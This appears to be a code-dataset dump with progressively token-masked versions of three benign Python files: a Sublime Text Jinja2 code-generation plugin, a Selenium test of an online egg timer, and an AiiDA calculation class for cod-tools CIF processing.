new_view.set_name('Untitled' + output_suffix)\n new_view.set_scratch(True)\n new_view.run_command('my_view_command', {'command': 'set_text', 'text': contents})\n\n def raise_err(self, message, exception_cls=None):\n exception_cls = exception_cls or Exception\n sublime.active_window().run_command(\"show_panel\", {\"panel\": \"console\", \"toggle\": True})\n sublime.status_message(message)\n raise exception_cls(message)\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n def run(self, edit):\n sublime.active_window().show_input_panel(\n \"Jinja2 JSON data\",\n '''[{\"value\":\"hello\"}]''',\n on_done=self.make_it_so,\n on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n\n # get json data\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n\n # make sure we can iterate\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n\n self.write_new_buffer(\"\\n\".join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err(\"No command provided\")\n\n if args['command'] == \"set_text\":\n self.view.replace(edit, sublime.Region(0, self.view.size()), args['text'])\n else:\n self.raise_err(\"Command not recognized: {}\".format(args['command']))\n",
"import json\nimport sublime\nimport sublime_plugin\nimport os\nimport re\nfrom .jinja2 import Environment\n\n\nclass PluginMixin:\n\n def get_selection(self):\n selections = []\n for region in self.view.sel():\n if not region.empty():\n selections.append(region)\n if len(selections) == 0:\n selections.append(sublime.Region(0, self.view.size()))\n return selections\n\n def get_contents(self):\n contents = self.view.substr(sublime.Region(0, self.view.size()))\n return contents\n\n def write_new_buffer(self, contents, output_suffix=' - output'):\n buffername = self.view.name()\n filename = self.view.file_name()\n new_view = self.view.window().new_file()\n if buffername:\n new_view.set_name(buffername + output_suffix)\n elif filename:\n basename = os.path.basename(filename)\n new_view.set_name(basename + output_suffix)\n else:\n new_view.set_name('Untitled' + output_suffix)\n new_view.set_scratch(True)\n new_view.run_command('my_view_command', {'command': 'set_text',\n 'text': contents})\n\n def raise_err(self, message, exception_cls=None):\n exception_cls = exception_cls or Exception\n sublime.active_window().run_command('show_panel', {'panel':\n 'console', 'toggle': True})\n sublime.status_message(message)\n raise exception_cls(message)\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit):\n sublime.active_window().show_input_panel('Jinja2 JSON data',\n '[{\"value\":\"hello\"}]', on_done=self.make_it_so, on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n\n\nclass PluginMixin:\n\n def get_selection(self):\n selections = []\n for region in self.view.sel():\n if not region.empty():\n selections.append(region)\n if len(selections) == 0:\n selections.append(sublime.Region(0, self.view.size()))\n return selections\n\n def get_contents(self):\n contents = self.view.substr(sublime.Region(0, self.view.size()))\n return contents\n\n def write_new_buffer(self, contents, output_suffix=' - output'):\n buffername = self.view.name()\n filename = self.view.file_name()\n new_view = self.view.window().new_file()\n if buffername:\n new_view.set_name(buffername + output_suffix)\n elif filename:\n basename = os.path.basename(filename)\n new_view.set_name(basename + output_suffix)\n else:\n new_view.set_name('Untitled' + output_suffix)\n new_view.set_scratch(True)\n new_view.run_command('my_view_command', {'command': 'set_text',\n 'text': contents})\n\n def raise_err(self, message, exception_cls=None):\n exception_cls = exception_cls or Exception\n sublime.active_window().run_command('show_panel', {'panel':\n 'console', 'toggle': True})\n sublime.status_message(message)\n raise exception_cls(message)\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit):\n sublime.active_window().show_input_panel('Jinja2 JSON data',\n '[{\"value\":\"hello\"}]', on_done=self.make_it_so, on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n\n\nclass PluginMixin:\n <function token>\n\n def get_contents(self):\n contents = self.view.substr(sublime.Region(0, self.view.size()))\n return contents\n\n def write_new_buffer(self, contents, output_suffix=' - output'):\n buffername = self.view.name()\n filename = self.view.file_name()\n new_view = self.view.window().new_file()\n if buffername:\n new_view.set_name(buffername + output_suffix)\n elif filename:\n basename = os.path.basename(filename)\n new_view.set_name(basename + output_suffix)\n else:\n new_view.set_name('Untitled' + output_suffix)\n new_view.set_scratch(True)\n new_view.run_command('my_view_command', {'command': 'set_text',\n 'text': contents})\n\n def raise_err(self, message, exception_cls=None):\n exception_cls = exception_cls or Exception\n sublime.active_window().run_command('show_panel', {'panel':\n 'console', 'toggle': True})\n sublime.status_message(message)\n raise exception_cls(message)\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit):\n sublime.active_window().show_input_panel('Jinja2 JSON data',\n '[{\"value\":\"hello\"}]', on_done=self.make_it_so, on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n\n\nclass PluginMixin:\n <function token>\n\n def get_contents(self):\n contents = self.view.substr(sublime.Region(0, self.view.size()))\n return contents\n <function token>\n\n def raise_err(self, message, exception_cls=None):\n exception_cls = exception_cls or Exception\n sublime.active_window().run_command('show_panel', {'panel':\n 'console', 'toggle': True})\n sublime.status_message(message)\n raise exception_cls(message)\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit):\n sublime.active_window().show_input_panel('Jinja2 JSON data',\n '[{\"value\":\"hello\"}]', on_done=self.make_it_so, on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n\n\nclass PluginMixin:\n <function token>\n\n def get_contents(self):\n contents = self.view.substr(sublime.Region(0, self.view.size()))\n return contents\n <function token>\n <function token>\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit):\n sublime.active_window().show_input_panel('Jinja2 JSON data',\n '[{\"value\":\"hello\"}]', on_done=self.make_it_so, on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n\n\nclass PluginMixin:\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit):\n sublime.active_window().show_input_panel('Jinja2 JSON data',\n '[{\"value\":\"hello\"}]', on_done=self.make_it_so, on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n<class token>\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit):\n sublime.active_window().show_input_panel('Jinja2 JSON data',\n '[{\"value\":\"hello\"}]', on_done=self.make_it_so, on_change=None,\n on_cancel=None)\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n<class token>\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n <function token>\n\n def make_it_so(self, input):\n doc = self.get_contents()\n generated = []\n try:\n data = json.loads(input)\n except Exception as ex:\n self.raise_err(str(ex))\n try:\n iter(data)\n except TypeError as te:\n data = list(data)\n try:\n for templ_vars in data:\n result = Environment().from_string(doc).render(templ_vars)\n generated.append(result)\n except Exception as ex:\n self.raise_err(str(ex))\n self.write_new_buffer('\\n'.join(generated))\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n<class token>\n\n\nclass Mattmc3CodegenFromJinja2(sublime_plugin.TextCommand, PluginMixin):\n <function token>\n <function token>\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n<class token>\n<class token>\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n\n def run(self, edit, **args):\n if 'command' not in args:\n self.raise_err('No command provided')\n if args['command'] == 'set_text':\n self.view.replace(edit, sublime.Region(0, self.view.size()),\n args['text'])\n else:\n self.raise_err('Command not recognized: {}'.format(args['command'])\n )\n",
"<import token>\n<class token>\n<class token>\n\n\nclass MyViewCommandCommand(sublime_plugin.TextCommand, PluginMixin):\n <function token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n"
] | false |
99,861 | 7ede0e24e998a050a49025dbf1b0be0b115411b7 | from selenium import webdriver
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
import sched
import time
from datetime import datetime
class Eggtests:
def setup(self):
self.driver = webdriver.Chrome()
self.driver.get('https://e.ggtimer.com/')
self.driver.maximize_window()
my_element = WebDriverWait(self.driver, 3).until(EC.visibility_of_all_elements_located((By.ID,'start_a_timer')))
def test(self, interval):
self.set_item(interval)
self.click_go()
first_display_value = self.get_first_display_number()
self.check_timer(first_display_value)
def set_item(self, interval):
item_element = self.driver.find_element(By.ID, 'start_a_timer')
item_element.clear()
self.input_interval = int(interval)
item_element.send_keys(interval)
def click_go(self):
go_button = self.driver.find_element(By.ID, 'timergo')
#System time before the click button
self.go_button_click_time = datetime.now()
go_button.submit()
def get_first_display_number(self):
return self.get_display_number();
def get_display_number(self):
timer_element = self.driver.find_element(By.ID, 'progressText')
string_value_read = timer_element.text
#split on space and get 1st value
string_array = string_value_read.split(" ")
number_value_read = string_array[0]
int_value_read = int(number_value_read)
return int_value_read
def get_time_elapesed_from_click_go(self):
#current system time minus the time when go was clicked in seconds
diff_in_float = (datetime.now() - self.go_button_click_time).total_seconds()
diff_in_int = int(diff_in_float)
#return input count minus the difference in seconds
return self.input_interval - diff_in_int
def check_timer(self, int_value):
if int_value > 0:
elapsed_time = self.get_time_elapesed_from_click_go()
int_value_read = self.get_display_number()
assert int_value_read == int_value
if int_value >= 0:
s = sched.scheduler(time.time, time.sleep)
s.enter(1, 1, self.check_timer, argument=(int_value-1,))
s.run()
if int_value < 0:
alert = self.driver.switch_to.alert
alert.accept()
def tear_down(self):
self.driver.close()
print 'Test finished'
| [
"from selenium import webdriver\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nimport sched\r\nimport time\r\nfrom datetime import datetime\r\n\r\nclass Eggtests:\r\n\r\n def setup(self):\r\n self.driver = webdriver.Chrome()\r\n self.driver.get('https://e.ggtimer.com/')\r\n self.driver.maximize_window()\r\n my_element = WebDriverWait(self.driver, 3).until(EC.visibility_of_all_elements_located((By.ID,'start_a_timer')))\r\n\r\n def test(self, interval):\r\n self.set_item(interval)\r\n self.click_go()\r\n first_display_value = self.get_first_display_number()\r\n self.check_timer(first_display_value)\r\n\r\n def set_item(self, interval):\r\n item_element = self.driver.find_element(By.ID, 'start_a_timer')\r\n item_element.clear()\r\n self.input_interval = int(interval)\r\n item_element.send_keys(interval)\r\n\r\n def click_go(self):\r\n go_button = self.driver.find_element(By.ID, 'timergo')\r\n #System time before the click button\r\n self.go_button_click_time = datetime.now()\r\n go_button.submit()\r\n\r\n def get_first_display_number(self):\r\n return self.get_display_number();\r\n\r\n def get_display_number(self):\r\n timer_element = self.driver.find_element(By.ID, 'progressText')\r\n string_value_read = timer_element.text\r\n #split on space and get 1st value\r\n string_array = string_value_read.split(\" \")\r\n number_value_read = string_array[0]\r\n int_value_read = int(number_value_read)\r\n return int_value_read\r\n\r\n def get_time_elapesed_from_click_go(self):\r\n #current system time minus the time when go was clicked in seconds\r\n diff_in_float = (datetime.now() - self.go_button_click_time).total_seconds()\r\n diff_in_int = int(diff_in_float)\r\n #return input count minus the difference in seconds\r\n return self.input_interval - diff_in_int\r\n\r\n def check_timer(self, int_value):\r\n\r\n if int_value > 0:\r\n elapsed_time = self.get_time_elapesed_from_click_go()\r\n int_value_read = self.get_display_number()\r\n assert int_value_read == int_value\r\n\r\n if int_value >= 0:\r\n s = sched.scheduler(time.time, time.sleep)\r\n s.enter(1, 1, self.check_timer, argument=(int_value-1,))\r\n s.run()\r\n\r\n if int_value < 0:\r\n alert = self.driver.switch_to.alert\r\n alert.accept()\r\n\r\n def tear_down(self):\r\n self.driver.close()\r\n print 'Test finished'\r\n"
] | true |
99,862 | ca004f2f07f30a5be35f77d21a021c79ea2fd4b1 | # -*- coding: utf-8 -*-
"""Generic `CalcJob` implementation that can easily be extended to work with any of the `cod-tools` scripts."""
import copy
from aiida.common import datastructures, exceptions
from aiida.engine import CalcJob
from aiida.orm import CifData, Dict
class CifBaseCalculation(CalcJob):
"""Generic `CalcJob` implementation that can easily be extended to work with any of the `cod-tools` scripts."""
_default_parser = 'codtools.cif_base'
_default_cli_parameters = {}
@classmethod
def define(cls, spec):
# yapf: disable
super().define(spec)
spec.input('metadata.options.input_filename', valid_type=str, default='aiida.in',
help='Filename to which the input for the code that is to be run will be written.')
spec.input('metadata.options.output_filename', valid_type=str, default='aiida.out',
help='Filename to which the content of stdout of the code that is to be run will be written.')
spec.input('metadata.options.error_filename', valid_type=str, default='aiida.err',
help='Filename to which the content of stderr of the code that is to be run will be written.')
spec.input('metadata.options.parser_name', valid_type=str, default=cls._default_parser,
help='Define the parser to be used by setting its entry point name.')
spec.input('metadata.options.attach_messages', valid_type=bool, default=False,
help='When True, warnings and errors written to stderr will be attached as the `messages` output node')
spec.input('cif', valid_type=CifData, required=True,
help='The CIF to be processed.')
spec.input('parameters', valid_type=Dict, required=False,
help='Command line parameters.')
spec.output('messages', valid_type=Dict, required=False,
help='Warning and error messages returned by script.')
spec.exit_code(300, 'ERROR_NO_OUTPUT_FILES',
message='Neither the output for the error file could be read from the retrieved folder.')
spec.exit_code(311, 'ERROR_READING_OUTPUT_FILE',
message='The output file could not be read from the retrieved folder.')
spec.exit_code(312, 'ERROR_READING_ERROR_FILE',
message='The error file could not be read from the retrieved folder.')
spec.exit_code(313, 'ERROR_EMPTY_OUTPUT_FILE',
message='The output file is empty.')
spec.exit_code(320, 'ERROR_INVALID_COMMAND_LINE_OPTION',
message='Invalid command line option passed.')
spec.exit_code(400, 'ERROR_PARSING_OUTPUT_DATA',
message='The output file could not be parsed.')
spec.exit_code(410, 'ERROR_PARSING_CIF_DATA',
message='The output file could not be parsed into a CifData object.')
def _validate_resources(self):
"""Validate the resources defined in the options."""
resources = self.options.resources
for key in ['num_machines', 'num_mpiprocs_per_machine', 'tot_num_mpiprocs']:
if key in resources and resources[key] != 1:
raise exceptions.FeatureNotAvailable(
f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: '
'parallelization is not supported, only a value of `1` is accepted.'
)
def prepare_for_submission(self, folder):
"""This method is called prior to job submission with a set of calculation input nodes.
The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a
temporary folder. A CalcInfo instance will be returned that contains lists of files that need to be copied to
the remote machine before job submission, as well as file lists that are to be retrieved after job completion.
:param folder: an aiida.common.folders.Folder to temporarily write files on disk
:returns: CalcInfo instance
"""
from aiida_codtools.cli.utils.parameters import CliParameters
try:
parameters = self.inputs.parameters.get_dict()
except AttributeError:
parameters = {}
self._validate_resources()
cli_parameters = copy.deepcopy(self._default_cli_parameters)
cli_parameters.update(parameters)
codeinfo = datastructures.CodeInfo()
codeinfo.code_uuid = self.inputs.code.uuid
codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters).get_list()
codeinfo.stdin_name = self.options.input_filename
codeinfo.stdout_name = self.options.output_filename
codeinfo.stderr_name = self.options.error_filename
calcinfo = datastructures.CalcInfo()
calcinfo.uuid = str(self.uuid)
calcinfo.codes_info = [codeinfo]
calcinfo.retrieve_list = [self.options.output_filename, self.options.error_filename]
calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.filename, self.options.input_filename)]
calcinfo.remote_copy_list = []
return calcinfo
| [
"# -*- coding: utf-8 -*-\n\"\"\"Generic `CalcJob` implementation that can easily be extended to work with any of the `cod-tools` scripts.\"\"\"\nimport copy\n\nfrom aiida.common import datastructures, exceptions\nfrom aiida.engine import CalcJob\nfrom aiida.orm import CifData, Dict\n\n\nclass CifBaseCalculation(CalcJob):\n \"\"\"Generic `CalcJob` implementation that can easily be extended to work with any of the `cod-tools` scripts.\"\"\"\n\n _default_parser = 'codtools.cif_base'\n _default_cli_parameters = {}\n\n @classmethod\n def define(cls, spec):\n # yapf: disable\n super().define(spec)\n spec.input('metadata.options.input_filename', valid_type=str, default='aiida.in',\n help='Filename to which the input for the code that is to be run will be written.')\n spec.input('metadata.options.output_filename', valid_type=str, default='aiida.out',\n help='Filename to which the content of stdout of the code that is to be run will be written.')\n spec.input('metadata.options.error_filename', valid_type=str, default='aiida.err',\n help='Filename to which the content of stderr of the code that is to be run will be written.')\n spec.input('metadata.options.parser_name', valid_type=str, default=cls._default_parser,\n help='Define the parser to be used by setting its entry point name.')\n spec.input('metadata.options.attach_messages', valid_type=bool, default=False,\n help='When True, warnings and errors written to stderr will be attached as the `messages` output node')\n\n spec.input('cif', valid_type=CifData, required=True,\n help='The CIF to be processed.')\n spec.input('parameters', valid_type=Dict, required=False,\n help='Command line parameters.')\n\n spec.output('messages', valid_type=Dict, required=False,\n help='Warning and error messages returned by script.')\n\n spec.exit_code(300, 'ERROR_NO_OUTPUT_FILES',\n message='Neither the output for the error file could be read from the retrieved folder.')\n spec.exit_code(311, 'ERROR_READING_OUTPUT_FILE',\n message='The output file could not be read from the retrieved folder.')\n spec.exit_code(312, 'ERROR_READING_ERROR_FILE',\n message='The error file could not be read from the retrieved folder.')\n spec.exit_code(313, 'ERROR_EMPTY_OUTPUT_FILE',\n message='The output file is empty.')\n spec.exit_code(320, 'ERROR_INVALID_COMMAND_LINE_OPTION',\n message='Invalid command line option passed.')\n spec.exit_code(400, 'ERROR_PARSING_OUTPUT_DATA',\n message='The output file could not be parsed.')\n spec.exit_code(410, 'ERROR_PARSING_CIF_DATA',\n message='The output file could not be parsed into a CifData object.')\n\n def _validate_resources(self):\n \"\"\"Validate the resources defined in the options.\"\"\"\n resources = self.options.resources\n\n for key in ['num_machines', 'num_mpiprocs_per_machine', 'tot_num_mpiprocs']:\n if key in resources and resources[key] != 1:\n raise exceptions.FeatureNotAvailable(\n f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: '\n 'parallelization is not supported, only a value of `1` is accepted.'\n )\n\n def prepare_for_submission(self, folder):\n \"\"\"This method is called prior to job submission with a set of calculation input nodes.\n\n The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a\n temporary folder. A CalcInfo instance will be returned that contains lists of files that need to be copied to\n the remote machine before job submission, as well as file lists that are to be retrieved after job completion.\n\n :param folder: an aiida.common.folders.Folder to temporarily write files on disk\n :returns: CalcInfo instance\n \"\"\"\n from aiida_codtools.cli.utils.parameters import CliParameters\n\n try:\n parameters = self.inputs.parameters.get_dict()\n except AttributeError:\n parameters = {}\n\n self._validate_resources()\n\n cli_parameters = copy.deepcopy(self._default_cli_parameters)\n cli_parameters.update(parameters)\n\n codeinfo = datastructures.CodeInfo()\n codeinfo.code_uuid = self.inputs.code.uuid\n codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters).get_list()\n codeinfo.stdin_name = self.options.input_filename\n codeinfo.stdout_name = self.options.output_filename\n codeinfo.stderr_name = self.options.error_filename\n\n calcinfo = datastructures.CalcInfo()\n calcinfo.uuid = str(self.uuid)\n calcinfo.codes_info = [codeinfo]\n calcinfo.retrieve_list = [self.options.output_filename, self.options.error_filename]\n calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.filename, self.options.input_filename)]\n calcinfo.remote_copy_list = []\n\n return calcinfo\n",
"<docstring token>\nimport copy\nfrom aiida.common import datastructures, exceptions\nfrom aiida.engine import CalcJob\nfrom aiida.orm import CifData, Dict\n\n\nclass CifBaseCalculation(CalcJob):\n \"\"\"Generic `CalcJob` implementation that can easily be extended to work with any of the `cod-tools` scripts.\"\"\"\n _default_parser = 'codtools.cif_base'\n _default_cli_parameters = {}\n\n @classmethod\n def define(cls, spec):\n super().define(spec)\n spec.input('metadata.options.input_filename', valid_type=str,\n default='aiida.in', help=\n 'Filename to which the input for the code that is to be run will be written.'\n )\n spec.input('metadata.options.output_filename', valid_type=str,\n default='aiida.out', help=\n 'Filename to which the content of stdout of the code that is to be run will be written.'\n )\n spec.input('metadata.options.error_filename', valid_type=str,\n default='aiida.err', help=\n 'Filename to which the content of stderr of the code that is to be run will be written.'\n )\n spec.input('metadata.options.parser_name', valid_type=str, default=\n cls._default_parser, help=\n 'Define the parser to be used by setting its entry point name.')\n spec.input('metadata.options.attach_messages', valid_type=bool,\n default=False, help=\n 'When True, warnings and errors written to stderr will be attached as the `messages` output node'\n )\n spec.input('cif', valid_type=CifData, required=True, help=\n 'The CIF to be processed.')\n spec.input('parameters', valid_type=Dict, required=False, help=\n 'Command line parameters.')\n spec.output('messages', valid_type=Dict, required=False, help=\n 'Warning and error messages returned by script.')\n spec.exit_code(300, 'ERROR_NO_OUTPUT_FILES', message=\n 'Neither the output for the error file could be read from the retrieved folder.'\n )\n spec.exit_code(311, 'ERROR_READING_OUTPUT_FILE', message=\n 'The output file could not be read from the retrieved folder.')\n spec.exit_code(312, 'ERROR_READING_ERROR_FILE', message=\n 'The error file could not be read from the retrieved folder.')\n spec.exit_code(313, 'ERROR_EMPTY_OUTPUT_FILE', message=\n 'The output file is empty.')\n spec.exit_code(320, 'ERROR_INVALID_COMMAND_LINE_OPTION', message=\n 'Invalid command line option passed.')\n spec.exit_code(400, 'ERROR_PARSING_OUTPUT_DATA', message=\n 'The output file could not be parsed.')\n spec.exit_code(410, 'ERROR_PARSING_CIF_DATA', message=\n 'The output file could not be parsed into a CifData object.')\n\n def _validate_resources(self):\n \"\"\"Validate the resources defined in the options.\"\"\"\n resources = self.options.resources\n for key in ['num_machines', 'num_mpiprocs_per_machine',\n 'tot_num_mpiprocs']:\n if key in resources and resources[key] != 1:\n raise exceptions.FeatureNotAvailable(\n f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: parallelization is not supported, only a value of `1` is accepted.'\n )\n\n def prepare_for_submission(self, folder):\n \"\"\"This method is called prior to job submission with a set of calculation input nodes.\n\n The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a\n temporary folder. A CalcInfo instance will be returned that contains lists of files that need to be copied to\n the remote machine before job submission, as well as file lists that are to be retrieved after job completion.\n\n :param folder: an aiida.common.folders.Folder to temporarily write files on disk\n :returns: CalcInfo instance\n \"\"\"\n from aiida_codtools.cli.utils.parameters import CliParameters\n try:\n parameters = self.inputs.parameters.get_dict()\n except AttributeError:\n parameters = {}\n self._validate_resources()\n cli_parameters = copy.deepcopy(self._default_cli_parameters)\n cli_parameters.update(parameters)\n codeinfo = datastructures.CodeInfo()\n codeinfo.code_uuid = self.inputs.code.uuid\n codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters\n ).get_list()\n codeinfo.stdin_name = self.options.input_filename\n codeinfo.stdout_name = self.options.output_filename\n codeinfo.stderr_name = self.options.error_filename\n calcinfo = datastructures.CalcInfo()\n calcinfo.uuid = str(self.uuid)\n calcinfo.codes_info = [codeinfo]\n calcinfo.retrieve_list = [self.options.output_filename, self.\n options.error_filename]\n calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.\n filename, self.options.input_filename)]\n calcinfo.remote_copy_list = []\n return calcinfo\n",
"<docstring token>\n<import token>\n\n\nclass CifBaseCalculation(CalcJob):\n \"\"\"Generic `CalcJob` implementation that can easily be extended to work with any of the `cod-tools` scripts.\"\"\"\n _default_parser = 'codtools.cif_base'\n _default_cli_parameters = {}\n\n @classmethod\n def define(cls, spec):\n super().define(spec)\n spec.input('metadata.options.input_filename', valid_type=str,\n default='aiida.in', help=\n 'Filename to which the input for the code that is to be run will be written.'\n )\n spec.input('metadata.options.output_filename', valid_type=str,\n default='aiida.out', help=\n 'Filename to which the content of stdout of the code that is to be run will be written.'\n )\n spec.input('metadata.options.error_filename', valid_type=str,\n default='aiida.err', help=\n 'Filename to which the content of stderr of the code that is to be run will be written.'\n )\n spec.input('metadata.options.parser_name', valid_type=str, default=\n cls._default_parser, help=\n 'Define the parser to be used by setting its entry point name.')\n spec.input('metadata.options.attach_messages', valid_type=bool,\n default=False, help=\n 'When True, warnings and errors written to stderr will be attached as the `messages` output node'\n )\n spec.input('cif', valid_type=CifData, required=True, help=\n 'The CIF to be processed.')\n spec.input('parameters', valid_type=Dict, required=False, help=\n 'Command line parameters.')\n spec.output('messages', valid_type=Dict, required=False, help=\n 'Warning and error 